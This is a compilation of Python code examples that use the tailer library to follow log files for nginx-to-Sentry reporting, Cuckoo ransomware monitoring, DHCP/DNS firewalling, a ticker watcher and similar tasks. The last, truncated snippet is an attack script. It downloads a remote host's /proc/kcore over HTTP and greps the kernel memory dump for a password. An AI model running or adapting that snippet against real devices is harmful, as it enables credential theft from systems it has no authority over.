Example #1
0
 def findpattern_from_file(self):
     if self.line == 1:
         for line in tailer.follow(self.file):
             self.make_alert(line)
     else:
         for line in tailer.follow(self.file):
             self.check_multiline(line)
Example #2
0
def op_log_speech(in_logname):
    global rtn_str
    for log_str in tailer.follow(open(in_logname), delay=0.5):
        if log_str.find("SendCmdToVoiceModule") >= 0:   # 默认HandleVoiceCmd都能正确接到,只判断是否有反馈发送出来
            send_str = log_str[log_str.find("SendCmdToVoiceModule"):log_str.find(",")]
            time_str = time.strftime("%F %X ")
            rtn_str = str(time_str) + str(send_str)
Example #3
0
def nginx():

    logger = "Nginx error logs"

    for line in tailer.follow(open(filepath)):

        # create the message
        date_time_message, otherinfo = nginx_error_parser(line)
        params = [date_time_message[2],
                  date_time_message[0],
                  date_time_message[1],
                  otherinfo.get("request", "-"),
                  otherinfo.get("referrer", "-"),
                  otherinfo.get("server", "-"),
                  otherinfo.get("client", "-"),
                  otherinfo.get("host", "-"),
                  otherinfo.get("upstream", "-")]
        message ='%s' % date_time_message[2]
        extended_message =  '%s\n'\
                            'Date: %s\n'\
                            'Time: %s\n'\
                            'Request: %s\n'\
                            'Referrer: %s\n'\
                            'Server: %s\n'\
                            'Client: %s\n'\
                            'Host: %s\n'\
                            'Upstream: %s\n'
        site = otherinfo.get("referrer", "-")

        # send the message to sentry using Raven
        send_message(message, extended_message, params, site, logger)
Example #4
0
 def track_ticker(self):
     for line in tailer.follow(open(const.DATA_DIR + "/ticker.jsons")):
         try:
             ticker = json.loads(line)
             self.data['last_ticker'] = ticker
             if self.on_trigger != None:
                 for trigger in self.triggers:
                     executed = trigger.get('executed', False)
                     last_price = float(ticker['last'])
                     if executed == False and trigger[
                             'threshold'] == const.THRESHOLD_PRICE_ABOVE and last_price > trigger[
                                 'value']:
                         self.on_trigger('activate', trigger, ticker)
                     if executed == True and trigger[
                             'threshold'] == const.THRESHOLD_PRICE_ABOVE and last_price <= trigger[
                                 'value']:
                         self.on_trigger('deactivate', trigger, ticker)
                     if executed == False and trigger[
                             'threshold'] == const.THRESHOLD_PRICE_BELOW and last_price < trigger[
                                 'value']:
                         self.on_trigger('activate', trigger, ticker)
                     if executed == True and trigger[
                             'threshold'] == const.THRESHOLD_PRICE_BELOW and last_price >= trigger[
                                 'value']:
                         self.on_trigger('deactivate', trigger, ticker)
         except ValueError:
             pass
Example #5
0
def nginx():

    logger = "Nginx error logs"

    for line in tailer.follow(open(filepath)):

        # create the message
        date_time_message, otherinfo = nginx_error_parser(line)
        params = [
            date_time_message[2], date_time_message[0], date_time_message[1],
            otherinfo.get("request", "-"),
            otherinfo.get("referrer", "-"),
            otherinfo.get("server", "-"),
            otherinfo.get("client", "-"),
            otherinfo.get("host", "-"),
            otherinfo.get("upstream", "-")
        ]
        message = '%s' % date_time_message[2]
        extended_message =  '%s\n'\
                            'Date: %s\n'\
                            'Time: %s\n'\
                            'Request: %s\n'\
                            'Referrer: %s\n'\
                            'Server: %s\n'\
                            'Client: %s\n'\
                            'Host: %s\n'\
                            'Upstream: %s\n'
        site = otherinfo.get("referrer", "-")

        # send the message to sentry using Raven
        send_message(message, extended_message, params, site, logger)
Example #6
0
def follow_log(file,key):
    if os.path.exists(file):
        if key == 'virus':
            print('防病毒日志文件开始读取')
        elif key == 'ids':
            print('ids日志开始读取')
    else:
        print('没有找到该日志')
        return
    for line in tailer.follow(open(file, encoding='utf-8', buffering=516)):
        if key == 'virus':
            ls_viruslog = [1, 3, 4, 4, 4, 4]
            log_array = str_split(line, key)
            log_array = remove_arr(log_array, ls_viruslog)
            if log_array[4]=='查杀修复失败':
                msg = virus_module(log_array)
                print(msg)
                app.push_log(msg,'virus')
        elif key == 'ids':
            ls_idslog = [2, 3, 4, 4, 6]
            log_array = str_split(line, key)
            log_array = remove_arr(log_array, ls_idslog)
            if log_array[1] == 'pri=5' or log_array == 'pri=4':
                msg = ids_module(log_array)
                print(msg)
                app.push_log(msg,'ids')
        elif key == 'business':
            trust_ip = ['203.168.15.109']
            business_event = abnormal_business(ip=trust_ip,user='******')
            business_event.is_dangerlogin(line)
            business_event.is_blockedauth(line)
Example #7
0
    def _start_analysis_monitor(self):
        """
        Monitor completed jobs from Cuckoo to be analyzed
        """
        p = re.compile(ur'#(\d+): analysis procedure completed')
        #Read logs to determine when a task is done
        cuckoo_log = os.path.abspath(
            os.path.join(self.cuckoo_home, "log/cuckoo.log"))
        try:
            for line in tailer.follow(open(cuckoo_log)):
                m = re.search(p, line)
                if m:
                    try:
                        task = int(m.group(1))
                        cuckoo_task_dir = os.path.abspath(
                            os.path.join(self.cuckoo_home,
                                         "storage/analyses/" + str(task) +
                                         "/"))
                        logger.info("Analyzing " + str(cuckoo_task_dir))
                        result = self.analyze_cuckoo_sample(cuckoo_task_dir)
                        if result:
                            logger.info("Analysis complete")
                            if result.active:
                                logger.info(
                                    "Active ransomware found in task " +
                                    str(cuckoo_task_dir))
                                self.active_sample(cuckoo_task_dir, result)
                            else:
                                logger.info("Malware not active")

                    except Exception as e:
                        logger.exception(e)

        except Exception as e:
            logger.exception(e)
Example #8
0
    def report_progress(self, max_retry_times=20):
        ''' Show progress of ffmpeg rendering progress file.
            It has no return. It is a blocking thread.
        '''
        retry = max_retry_times
        while retry:
            if self.progressfilename is None:
                self._report_progress({'report': 'Progress File Not Exist'})
                retry -= 1
                time.sleep(0.5)  # Sleep 0.5 then retry
                continue

            try:
                with open(self.progressfilename, 'r') as f:
                    status_dict = {}  # The dict object hold the ffmpeg status
                    for each_status_line in tailer.follow(f):
                        pure = each_status_line.strip().split('=')
                        key, value = pure  # unpack the key value pair.
                        status_dict[key] = value
                        if key == 'progress':  # We hit the bottom line of ffmpeg report, periodically.
                            self._report_progress(status_dict)
                            status_dict = {}

                        if key == 'progress' and value == 'end':
                            retry = -1
                            status_dict = {}
            except IOError:
                self._report_progress(
                    {'report': 'Cannot Read Progress File. IOError.'})
                time.sleep(0.1)  # Sleep 0.5 then retry
                retry -= 1
def main():
    brand_2_old = ''
    for raw in tailer.follow(open('/tmp/raw_data.txt', 'r')):
        if args.brand == 1:
            if 'showQuestion' in raw:
                game = GetAnswer(args.brand, raw)
                game.run()
        elif args.brand == 2:
            try:
                raw = raw.split('(')[-1].split(')')[0]
                raw_json = json.loads(raw)
                raw_question = raw_json['data']['msg']['answer']['doing'][
                    'doing']['title']
                raw_question_showanswer = raw_json['data']['msg']['answer'][
                    'doing']['doing']['show_answer']
                if not raw_question_showanswer:
                    if raw_question != brand_2_old:
                        game = GetAnswer(args.brand, raw_json)
                        game.run()
                    brand_2_old = raw_question
            except Exception as e:
                continue
        else:
            print("python3 search_question -h")
            print("请查看帮助文档,目前仅支持两个APP的抓包获取题目。")
            sys.exit(1)
Example #10
0
    def readLog():

        #take file and read the last line
        file = tailer.tail(open('myLogFile.txt', 'w'), 1)
        #follow the file as it grows
        for line in tailer.follow(open('myLogFil.txt')):
            print(line)
Example #11
0
 def logger(self):
     for line in follow(open('log/nmea_muxer.log')):
         if self.logging:
             self.socketio.emit('logline', {"line": line},
                                namespace='/livelogs')
         else:
             return
Example #12
0
def find_poller():
    """Example of how to send server generated events to clients."""
    socketio.sleep(10)
    for line in tailer.follow(open(sconf.f_out)):
        idx, score, rect = parse_find_line(line)
        send_new_result(idx, score, rect)
        if sconf.nn_thread is None:
            return True
Example #13
0
def main():  # pragma: no cover
    mimic_service.prepare_service(sys.argv)
    CONF.log_opt_values(LOG, logging.INFO)
    LOG.info("mimic log service start, scanning %s." %
             CONF.uos_install_stage2_log)
    commands.getstatusoutput("touch %s" % CONF.uos_install_stage2_log)
    for line in tailer.follow(open(CONF.uos_install_stage2_log)):
        get_status_from_input(line)
Example #14
0
def tail(logfile: Path) -> None:
    colorama.init()
    for line in tailer.follow(open(logfile), delay=0.3):
        # "https://www.devdungeon.com/content/colorize-terminal-output-python"
        # If using Windows, init() will cause anything sent to stdout or stderr
        # will have ANSI color codes converted to the Windows versions. Hooray!
        # If you are already using an ANSI compliant shell, it won't do anything
        print(line)
Example #15
0
def watch_thread(data):
	for l in tailer.follow(open(tailer_file)):
		try:
			d = cpl.parse(l)
		except Exception, e:
			continue
		
		actiontime = datetime.datetime.strptime(d['timestamp'], '%Y-%m-%d-T%H:%M:%S+0000')
		currenttime = datetime.datetime.utcnow()
		diff = currenttime - actiontime
		# strip microseconds
		currenttime = currenttime.strftime("%Y-%m-%d %H:%M:%S")
		
		d['timestamp_utc'] = str(actiontime)
		d['timestamp_tz'] = datetime.datetime.now(pytz.timezone('America/Denver')).strftime('%Y-%m-%d %H:%M:%S') # <-- this does not 
		d['current_timestamp'] = str(currenttime)
		d['timestamp_diff'] = str(diff)
		
		socketio.emit('new actiontime', d, namespace='/counterpartywatch')
		
		if d['command'] == 'Send':
			socketio.emit('new send', d, namespace='/counterpartywatch')
			
		elif d['command'] == 'Issuance':
			if d['issueaction'] == 'created':
				socketio.emit('new issuance', d, namespace='/counterpartywatch')
			elif d['issueaction'] == 'locked':
				socketio.emit('new lock', d, namespace='/counterpartywatch')
				
		#*RPS************************************************
		elif d['command'] == 'RPS':
			socketio.emit('new rps', d, namespace='/counterpartywatch')
			
		elif d['command'] == 'RPS Match':
			d['tx_hash'] = d['tx_hash'][0 : 64] # truncate tx_hash to first 64 characters
			socketio.emit('rps match', d, namespace='/counterpartywatch')
			
		elif d['command'] == 'RPS Resolved':
			d['tx_hash'] = d['tx_hash'][0 : 64] # truncate tx_hash to first 64 characters
			if 'counterparty_move' in d.keys():
				d['counterparty_move_text'] = numtorps[int(d['counterparty_move'])]
			
			socketio.emit('rps resolved', d, namespace='/counterpartywatch')
			
		elif d['command'] == 'Expired RPS':
			d['tx_hash'] = d['tx_hash'][0 : 64] # truncate tx_hash to first 64 characters
			socketio.emit('rps expired', d, namespace='/counterpartywatch')
			
		elif d['command'] == 'Expired RPS Match':
			d['tx_hash'] = d['tx_hash'][0 : 64]
			socketio.emit('rps expiredmatch', d, namespace='/counterpartywatch')
		#******************************************************
		elif d['command'] == 'Bet':
			socketio.emit('new bet', d, namespace='/counterpartywatch')
		elif d['command'] == 'Expired bet':
			socketio.emit('expired bet', d)
		elif d['command'] == 'Block':
			socketio.emit('new block', d, namespace='/counterpartywatch')
Example #16
0
def read_file_logs():
  for line in tailer.follow(open(obj["file_logs_path"])):
    file_data=str(line).split(",")
    packet["time"]=str(file_data[0]).lstrip()
    packet["action"]=str(file_data[1]).lstrip()
    packet["paths"] =str(file_data[2]).lstrip()
    packet["user"] = str(file_data[3]).lstrip()
    file_log=json.dumps(packet)
    write_on_secure_socket(file_log)
Example #17
0
async def tail_log(task_id, send):
    log_file_path = os.path.join(settings.DEPLOY_LOG_PATH, f'{task_id}_log')
    if os.path.exists(log_file_path):
        for line in tailer.follow(open(log_file_path)):
            await send({'type': 'websocket.send', 'text': json.dumps(line)})
    else:
        await send({
            'type': 'websocket.send',
            'text': json.dumps(f'{log_file_path} not exist')
        })
Example #18
0
 def evaluate_file(self, file):
     (file_name, file_config) = file
     regex = utils.tokens_to_pattern(file_config['tokens'])
     with open(expanduser(file_config['path'])) as file:
         for line in tailer.follow(file):
             for alert in self._alerts[file_name].values():
                 matches = re.match(regex, line)
                 if matches:
                     gd = matches.groupdict()
                     alert.evaluate(gd, line)
Example #19
0
def main_func(filename, cross_finger, message, fields, grep, name):
    buffer = defaultdict(list)

    fields = set(filter(None, fields.split(',')))

    def print_if_needed(item, line):
        if message:
            if re.search(message, item['@message'], re.I) is None:
                return
        if grep:
            if re.search(grep, line, re.I) is None:
                return
        if name:
            if re.search(name, item['@fields'].get('name', ''), re.I) is None:
                return
        print_item(item, fields)

    if filename:
        stream = open(filename)
        stream = tailer.follow(stream)
    else:

        def unbuffered_lines(stream):
            while True:
                line = stream.readline()
                if line == '':
                    return

                yield line

        stream = unbuffered_lines(sys.stdin)

    for line in stream:
        try:
            item = anyjson.deserialize(line)
        except:
            continue

        if cross_finger:
            fields = item['@fields']
            if 'uuid' in fields:
                uuid = fields['uuid']
                buffer[uuid].append(item)
                if fields['level'] == 'ERROR':

                    echo('')
                    echo('=' * 80)
                    for item in buffer[uuid]:
                        print_if_needed(item, line)
                    del buffer[uuid]
            else:
                if fields['level'] == 'ERROR':
                    print_if_needed(item, line)
        else:
            print_if_needed(item, line)
Example #20
0
def main():
    global public_ip
    public_ip = get_public_ip()
    file = open(args.file, "r", encoding="utf-8")

    write_logging("Start")

    follow, stop = tailer.follow(file)
    stop_line_cnt = 0
    access_count = {}
    ban_status = {}
    date_min_last = ""
    for line in follow:

        if args.verbose > 3:
            print(line)
        stop_line_cnt += 1
        data = re.search(line_format_regex, line)
        if data:
            data_dict = data.groupdict()
            try:
                data_dict['post_dict'] = json.loads(data_dict['post_data'])
            except Exception as e:
                data_dict['post_dict'] = {}

            if args.verbose > 3:
                print(data_dict)

            datetimestring = parse(data_dict['dateandtime'][:11] + " " + data_dict['dateandtime'][12:])
            date_min_now = str(datetimestring)[:16]

            real_ip = data_dict["real_ip"]

            if args.verbose > 1:
                print(f"-- {real_ip} {data_dict['post_dict'].get('method')}, {data_dict['post_dict']}")

            if data_dict['post_dict'].get("method") == "icx_sendTransaction":
                # dump(data_dict['post_dict'])

                if args.verbose > 1:
                    print(f"- IN {real_ip}")
                access_count = count_up_dict(access_count, real_ip)

            if date_min_last != date_min_now:
                ban_status = actions(access_count, ban_status, date_min_last, date_min_now)

                if args.verbose > 3:
                    dump(access_count)
                    dump(ban_status)

                access_count = {}

            date_min_last = date_min_now
        else:
            print(f"[ERROR] {line}")
Example #21
0
 def tail(self, monfile):
     '''
     Get last line in file,  similarly to tail -f filename.
     '''
     try:
         while True:
             for line in tailer.follow(monfile, 1):
                 time.sleep(0.1)
                 yield line
     except:
         self.logger.error("Error while log-file parsing.")
Example #22
0
def read_iperf(file_name, graphite, target):
    start_time = int(time.time())
    for line in tailer.follow(open(file_name)):
        result = parse_line(line)
        if result is not None:
            print(result)
            send_to_graphite(graphite, str(target), result[0],
                             start_time + result[1])
        print(line)
        if line == 'EXIT':
            break
Example #23
0
def run_sfw():
    """

    Returns:

    """
    prev_logline = ''
    dhcp_ack_re = re.compile(DHCPACK_IP_ADDRESS)
    dhcp_discover_eth0_re = re.compile(DHCPDISCOVER_NO_ADDRESS_ETH0)
    dhcp_discover_eth1_re = re.compile(DHCPDISCOVER_NO_ADDRESS_ETH1)
    dns_query_re = re.compile(DNS_QUERY)
    if GSB_ENABLE:
        sbl = gsb_init()

    prev_allocated_mac = ""
    for logline in tailer.follow(open(DNSMASQ_LOG_FILE)):

        dhcp_ack = dhcp_ack_re.search(logline)
        if dhcp_ack:
            add_ip_mac_log_q(dhcp_ack.group(1), dhcp_ack.group(2))
            add_ip_scan_q(dhcp_ack.group(1))
            continue

        dhcp_discover_eth0 = dhcp_discover_eth0_re.search(logline)
        dhcp_discover_eth1_prev = dhcp_discover_eth1_re.search(prev_logline)
        # print("prev :",prev_logline)
        # print("current :", logline)
        if dhcp_discover_eth0 and dhcp_discover_eth1_prev:
            print("eth0,eth1 : ", dhcp_discover_eth0.group(2))
            if prev_allocated_mac != dhcp_discover_eth0.group(2):
                add_device_q(dhcp_discover_eth0.group(2))
                prev_logline = ""  # New need to confirm working
                prev_allocated_mac = dhcp_discover_eth0.group(2)
                time.sleep(1)
                continue

        dhcp_discover_eth1 = dhcp_discover_eth1_re.search(logline)
        dhcp_discover_eth0_prev = dhcp_discover_eth0_re.search(prev_logline)
        if dhcp_discover_eth1 and dhcp_discover_eth0_prev:
            print("eth1,eth0 : ", dhcp_discover_eth1.group(2))
            if prev_allocated_mac != dhcp_discover_eth1.group(2):
                add_device_q(dhcp_discover_eth1.group(2))
                prev_logline = ""
                prev_allocated_mac = dhcp_discover_eth1.group(2)
                time.sleep(1)
                continue

        dns_query = dns_query_re.search(logline)
        if dns_query:
            # print(dns_query.group(1) + "," + dns_query.group(2))
            add_dns_query_q(dns_query.group(1), dns_query.group(2))
        prev_logline = logline
 def run(self):
     for row in tailer.follow(open(self.log_path)):
         # TODO refactoring using visitor pattern
         section = Monitor.get_section(row)
         self.timed_queue.put(section)
         if section is not None and section != '':
             if section in self.counter:
                 self.counter[section] = self.counter[section] + 1
             else:
                 self.counter[section] = 1
             if self.counter[section] > self.maxcount:
                 self.maxcount = self.counter[section]
                 self.maxsection = section
Example #25
0
    def _collect_log(self, identifier, log, output, canceller):
        for line in tailer.follow(open(log.path)):
            try:
                data = log.regexp.match(line).groupdict()
            except AttributeError:
                data = {}
            else:
                data = log.parser.parse(data)

            output.write(identifier, log.path, data)

            if self.graceful_shutdown.is_set() or canceller.is_set():
                return
Example #26
0
 def run(self):
     try:
         import tailer
     except ImportError:
         print_("You must install tailer.", file=sys.stderr)
         exit(1)
     log = self.node.logfilename()
     try:
         for line in tailer.follow(open(log), delay=0.1):
             print_(line)
     except KeyboardInterrupt:
         print_('\n')
         pass
Example #27
0
 def handleMessage(self):
     while not os.path.isfile(self.logfile):
         time.sleep(0.1)
     import tailer
     for line in tailer.follow(open(self.logfile)):
         print(line)
         # if not connected:
         #     break
         if line is not None:
             time.sleep(0.1)
             send(line + '\n', broadcast=False)
         else:
             time.sleep(0.2)
Example #28
0
def show_log(app_name, ins_num):
    """
    查看应用日志
    """
    app_base_dir, log_base_dir, backup_base_dir, rollback_base_dir, app_prefix, app_type, app_dir, raw_dir = get_var(
        app_name, ins_num)
    log_file = os.path.join(log_base_dir, app_name, 'log', app_name + '.log')

    if os.path.exists(log_file):
        highlight('Tailing log %s' % log_file, 'prompt')
        for line in tailer.follow(open(log_file)):
            print line
    else:
        highlight('Log %s does not exist' % log_file, 'warn')
Example #29
0
    def log_watcher(self):
        """
        Watches the log file for this instance, and sends lines to be processed
        """   
        self.log_await()
            
        # When / if this process hits a problem, have it auto restart again
        try:
        
            for line in tailer.follow(open(self.instance.config['server']['log_path'])):
                self.instance.log_handler.process(line)

        except Exception as e:
            self.instance.exception_handler.log(e)    
            self.log_watcher()
Example #30
0
    def transfer(self):

        while True:
            try:
                for line in tailer.follow(self.logfile, retry=True):
                    _ = line.strip()
                    if _:
                        self.sock.send(packb(_))
            except KeyboardInterrupt:
                sock.close()
                self.logger.info('SIGINT detected')
                return
            except:
                from traceback import format_exc
                self.logger.error("{0}{1}".format("\n", format_exc()))
Example #31
0
    def run(self):
        ## get current position
        with open(path.join(self.path, "LoadingScreen.log")) as f:
            if self.get_position(f.readlines()):
                self.set_collector()

        start_new_thread(self.run_collector, ())

        # watch file
        for line in tailer.follow(
                open(path.join(self.path, "LoadingScreen.log"))):
            if self.get_position([line]):
                self.lock.acquire()
                self.set_collector()
                self.lock.release()
Example #32
0
def tailf(logfile):
    print("Starting to monitor {0} with pattern for rclone {1}".format(
        logfile, cfg['backend']))

    for line in tailer.follow(open(logfile)):
        if re.match(
                r".*(mkv:|mp4:|mpeg4:|avi:) received cache expiry notification",
                line):
            search = re.search(
                r'^[0-9]{4}\/[0-9]{2}\/[0-9]{2} [0-9]{2}:[0-9]{2}:[0-9]{2} INFO  : (.*): received cache expiry notification',
                line, re.IGNORECASE)
            if search is not None:
                f = search.group(1)
                print("Detected new file: {0}".format(f))
                scan(os.path.dirname(f))
Example #33
0
 def followTarget(self):
     # uses tailer to follow the output of the running process
     if os.name == "nt":
         flags = os.O_RDWR | os.O_TEMPORARY
     else:
         flags = os.O_RDWR
     
     try:
         f = os.open(self.outfileName, flags)
         fo = os.fdopen(f,'r'); 
         generator = tailer.follow(fo)
         for l in generator:
             print l
     finally:
         os.close(fo)
         os.close(f)
Example #34
0
 def run(self):
     for line in tailer.tail(open(self.page.file_path), self.page.plugin.lines):
         g15screen.run_on_redraw(self._add_line, line)
     self.fd = open(self.page.file_path)
     try:
         for line in tailer.follow(self.fd):
             if self._stopped:
                 break
             g15screen.run_on_redraw(self._add_line, line)
             if self._stopped:
                 break
     except ValueError as e:
         logger.debug("Error while reading", exc_info = e)
         if not self._stopped:
             raise e
     self.page.redraw()
Example #35
0
def main():
    #check log path if esixt
    if not os.path.isfile(config.game_log_path):
        print("ERROR : game_log_path not esixt!")
        return

    #tracking game log
    for line in tailer.follow(open(config.game_log_path, encoding='utf8'),
                              delay=0.05):
        if 'ˇˇ' not in line:
            if "] @來自 " in line:  #2020/06/09 12:13:04 72356671 acf [INFO Client xxx] @來自 <公會> 遊戲ID: 內容
                message = '私人訊息\n' + line[line.find('] @來自 ') + 6:]
                lineNotifyMessage(message)

            elif "] %" in line:  #2020/06/09 23:10:44 111816734 acf [INFO Client xxx] %<公會> 遊戲ID: 內容
                message = '隊伍訊息\n' + line[line.find('] %') + 3:]
                lineNotifyMessage(message)
Example #36
0
 def run(self):
     for line in tailer.tail(open(self.page.file_path),
                             self.page.plugin.lines):
         g15screen.run_on_redraw(self._add_line, line)
     self.fd = open(self.page.file_path)
     try:
         for line in tailer.follow(self.fd):
             if self._stopped:
                 break
             g15screen.run_on_redraw(self._add_line, line)
             if self._stopped:
                 break
     except ValueError as e:
         logger.debug("Error while reading", exc_info=e)
         if not self._stopped:
             raise e
     self.page.redraw()
Example #37
0
    def track_ticker(self):
        for line in tailer.follow(open(const.DATA_DIR + "/ticker.jsons")):
	    try:
            	ticker = json.loads(line)
            	self.data['last_ticker'] = ticker
                if self.on_trigger != None:
                    for trigger in self.triggers:
                        executed = trigger.get('executed', False)
                        last_price = float(ticker['last'])
                        if executed == False and trigger['threshold'] == const.THRESHOLD_PRICE_ABOVE and last_price > trigger['value']:
                            self.on_trigger('activate', trigger, ticker)
                        if executed == True and trigger['threshold'] == const.THRESHOLD_PRICE_ABOVE and last_price <= trigger['value']:
                            self.on_trigger('deactivate', trigger, ticker)
                        if executed == False and trigger['threshold'] == const.THRESHOLD_PRICE_BELOW and last_price < trigger['value']:
                            self.on_trigger('activate', trigger, ticker)
                        if executed == True and trigger['threshold'] == const.THRESHOLD_PRICE_BELOW and last_price >= trigger['value']:
                            self.on_trigger('deactivate', trigger, ticker)
            except ValueError:
		pass
Example #38
0
def _open(ctx, path, key, needs_tailf=False):
    fernet = Fernet(key)

    # Plain open
    f = open(path)

    # tail -f
    if needs_tailf:
        f = follow(f, delay=0.1)

    for line in f:
        prefix, encrypted = line.split(log_prefix)
        try:
            if isinstance(encrypted, str):
                encrypted = encrypted.encode('utf8')

            sys.stdout.write('{}{}\n'.format(prefix, fernet.decrypt(encrypted).decode('utf8')))
            sys.stdout.flush()
        except InvalidToken:
            sys.stderr.write('Invalid crypto key\n')
            sys.exit(1)
Example #39
0
def nginx():

    logger = "Nginx error logs"

    for line in tailer.follow(open(filepath)):
        line = unicode(line, errors='ignore')
        years = line[0:4]
        if (re.match('^\\s*$',line)):
            pass
        else:
            if (re.match(r'^\d+$',years)):

                # create the message
                date_time_message, otherinfo = nginx_error_parser(line)
                params = [date_time_message[2],
                          date_time_message[0],
                          date_time_message[1],
                          otherinfo.get("request", "-"),
                          otherinfo.get("referrer", "-"),
                          otherinfo.get("server", "-"),
                          otherinfo.get("client", "-"),
                          otherinfo.get("host", "-"),
                          otherinfo.get("upstream", "-")]
                message ='%s' % date_time_message[2]
                extended_message =  '%s\n'\
                                    'Date: %s\n'\
                                    'Time: %s\n'\
                                    'Request: %s\n'\
                                    'Referrer: %s\n'\
                                    'Server: %s\n'\
                                    'Client: %s\n'\
                                    'Host: %s\n'\
                                    'Upstream: %s\n'
                site = otherinfo.get("referrer", "-")
                
                # send the message to sentry using Raven
                send_message(message, extended_message, params, site, logger)
            else:
                pass
Example #40
0
    def follow_tail(self):
        """
        Read (tail and follow) the log file, parse entries and send messages
        to Sentry using Raven.
        """
        try:
            logfile = open(self.filepath)
        except (FileNotFoundError, PermissionError) as err:
            exit("Error: Can't read logfile %s (%s)" % (self.filepath, err))

        for line in tailer.follow(logfile):
            self.message = None
            self.extended_message = None
            self.params = None
            self.site = None

            self.parse(line)
            send_message(self.message,
                         self.extended_message,
                         self.params,
                         self.site,
                         self.logger)
Example #41
0
def nginx(opts=None):
    filepaths = {}

    nginx_error_path = getattr(opts, "nginxerrorpath", False)
    nginx_access_path = getattr(opts, "nginxaccesspath", False)
    
    if nginx_error_path:
        filepaths["error"] = {"filepath": nginx_error_path, "parser": nginx_error_parser}
    if nginx_access_path:
        filepaths["access"] = {"filepath": nginx_access_path, "parser": nginx_access_parser}

    for k,v in filepaths.iteritems():
        logger = "Nginx %s logs" % k
        filepath = v['filepath']
        parser = v['parser']
        
        if opts.parsehistory:
            # We're going to zcat all the log files and then
            for f in glob.glob(filepath+"*"):
                print "Parsing File: %s" % f
                
                if f.endswith(".gz"):
                    proc = subprocess.Popen(['zcat', f], stdout=subprocess.PIPE)
                    file = proc.stdout
                else:
                    file = open(f, 'rb')
                
                for line in file:
                    parse_line(opts, parser, logger, line)
        else:
            try:
                f = open(filepath)
            except:
                continue
            else:
                f.close()

            for line in tailer.follow(open(filepath)):
                parse_line(opts, parser, logger, line)
Example #42
0
def main():
    parser = argparse.ArgumentParser(description='Convert logs to custom fileformat(now supports json and yaml fileformats)', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('input_file', help='file with input logs', type=argparse.FileType('r'))
    parser.add_argument('output_file', help='file with parsed data', type=argparse.FileType('w'))
    # default nginx log_format: '$remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"' 
    # Note: spaces in log_format is important!
    parser.add_argument('log_format', help='''logs format. Supports: nginx log_format and apache CustomLog, also you may use custom format''')
    parser.add_argument('--log_type', help='type of log file.', choices=['nginx', 'apache', 'custom'], default='nginx')
    parser.add_argument('--result_type', help='type of parsed file', choices=['yaml', 'json'], default='json')
    parser.add_argument('-f', '--follow',  action='store_true', default=False,  help='process appended data as the file grows')
    args = parser.parse_args()
    
    parser = LogParser(args.log_format, args.log_type)
    parsed_logs = []
    try:
        for record in (tailer.follow(args.input_file) if args.follow else args.input_file):
            parsed_logs.append(parser.parse(record))
    except KeyboardInterrupt:
        print('interrupt received, stopping.')
    finally:
        if args.result_type == 'yaml':
            yaml.dump(parsed_logs, args.output_file, default_flow_style=False)
        elif args.result_type == 'json':
            json.dump(parsed_logs, args.output_file)
Example #43
0
#!/usr/bin/python

# application to follow the snot log and refresh the snotrocket
# cache as necessary

# doesn't return, must be run as a daemon

from elasticsearch import Elasticsearch
import tailer

from snotrocket_populate import import_ticket
import snotparser.snotparser as sp

snot_log = '/u/snot/test/logs/log'
#snot_log = 'test_log' # for testing
es_index = 'snotrocket'

es = Elasticsearch()


# Follow the snot log file
for line in tailer.follow(open(snot_log)):
    print line
    ticket_number = int(line.split()[9])
    print "processing updates to ticket {0}".format(ticket_number)
    import_ticket(ticket_number, es_index)


def getUpDn5():
	return tailer.follow(UpDn5File,0)
Example #45
0
def followfile(filepath,keywords,filelog):
    filepath = str(filepath)
    for line in tailer.follow(open(filepath)):
        print line
        grepstatus(line,keywords,filelog)
Example #46
0
 def run(self):
     for line in tailer.follow(self.server_log):
         self.on_server_log(line)
Example #47
0
                                        autofire(fire,e,a)
                                        a["fired"] = True

                                elif a["asl"]["send_method"] == "url" and e["http"].has_key("url"):
                                    if e["http"].has_key("url") and e["http"]["url"].endswith(".js") and e["http"].has_key("http_refer"):
                                        print "autofiring %s from search_http_for_alert to avoid .js %s " % (e["http"]["http_refer"],e["http"]["url"])
                                        a["fired_url"] = e["http"]["http_refer"]
                                        autofire(e["http"]["http_refer"],e,a)
                                    else:
                                        fire = build_url_from_entry(e)
                                        if fire != None:
                                            print "autofiring %s from search_http_for_alert" % (fire)
                                            a["fired_url"]=fire
                                            autofire(fire,e,a)
                                            a["fired"] = True

            if e["event_type"] == "alert":
                try:
                    if e["alert"]["signature_id"] not in alert_search_ignore_sid:
                        alert_check_search_list(e)
                except Exception as err:
                    print "failed to run alert_check_search %s" % (err)
        except Exception as err:
            print "Exception parsing line %s:\n%s\n%s" % (err,line,sys.exc_info()[-1].tb_lineno)

worker = Process(target=ProcessLOG, args=(log_queue,))
worker.daemon = True
worker.start()
for line in tailer.follow(open(conf["eve_file"])):
    log_queue.put(line)
Example #48
0
  #send email about lots of emails
  toaddr='*****@*****.**'
  fromaddr='*****@*****.**'
  msg="From: "+fromaddr+"\r\nTo: "+toaddr+"\r\n\r\nWarning: user "+email+" may be spamming on "+hostname+" They have sent over "+\
  str(limit)+" emails in the last hour or since you were last notified "
  subject="Mailbox Outgoing Spam Warning"
  server=smtplib.SMTP('localhost')
  server.sendmail(fromaddr, toaddr, msg)
  toaddr='*****@*****.**'
  server.sendmail(fromaddr, toaddr, msg)
  server.quit()


start_email()
alert('TEST ALERT')
for line in tailer.follow(open('/var/log/mail.log')):
  regex=re.compile('qmgr.*from=<(.*)>')
  lineres=regex.search(line)
  if lineres is not None:
    email=lineres.group(1)
    try:
      tally[email]+=1
    except KeyError:
      tally[email]=1
    print email,line
    if tally[email]>limit:
     alert(email)
     tally[email]=0
    if datetime.now().minute==0:
     tally={}
Example #49
0
print "starting to read memory dump.. "+bcolors.WARNING+"this could take a few minutes"+bcolors.ENDC
proc = subprocess.Popen("wget -qO- http://"+sys.argv[1]+"//proc/kcore > tmpstream.txt", shell=True, preexec_fn=os.setsid)
os.system('echo "" >tmpstrings.out')
time.sleep(1)
proc2 = subprocess.Popen("tail -f tmpstream.txt | strings >>tmpstrings.out", shell=True, preexec_fn=os.setsid)
print bcolors.BOLD+"hit CTRL+C to exit.."+bcolors.ENDC


while 1:
	sys.stdout.flush()
	if os.stat('tmpstrings.out').st_size <= 1024:
		sys.stdout.write("binary data: "+str(os.stat('tmpstream.txt').st_size)+"\r")
	else:
		sys.stdout.flush()
		print "strings in binary data found.. password should be around line 10000"
		for line in tailer.follow(open('tmpstrings.out','r')):
			sys.stdout.flush()
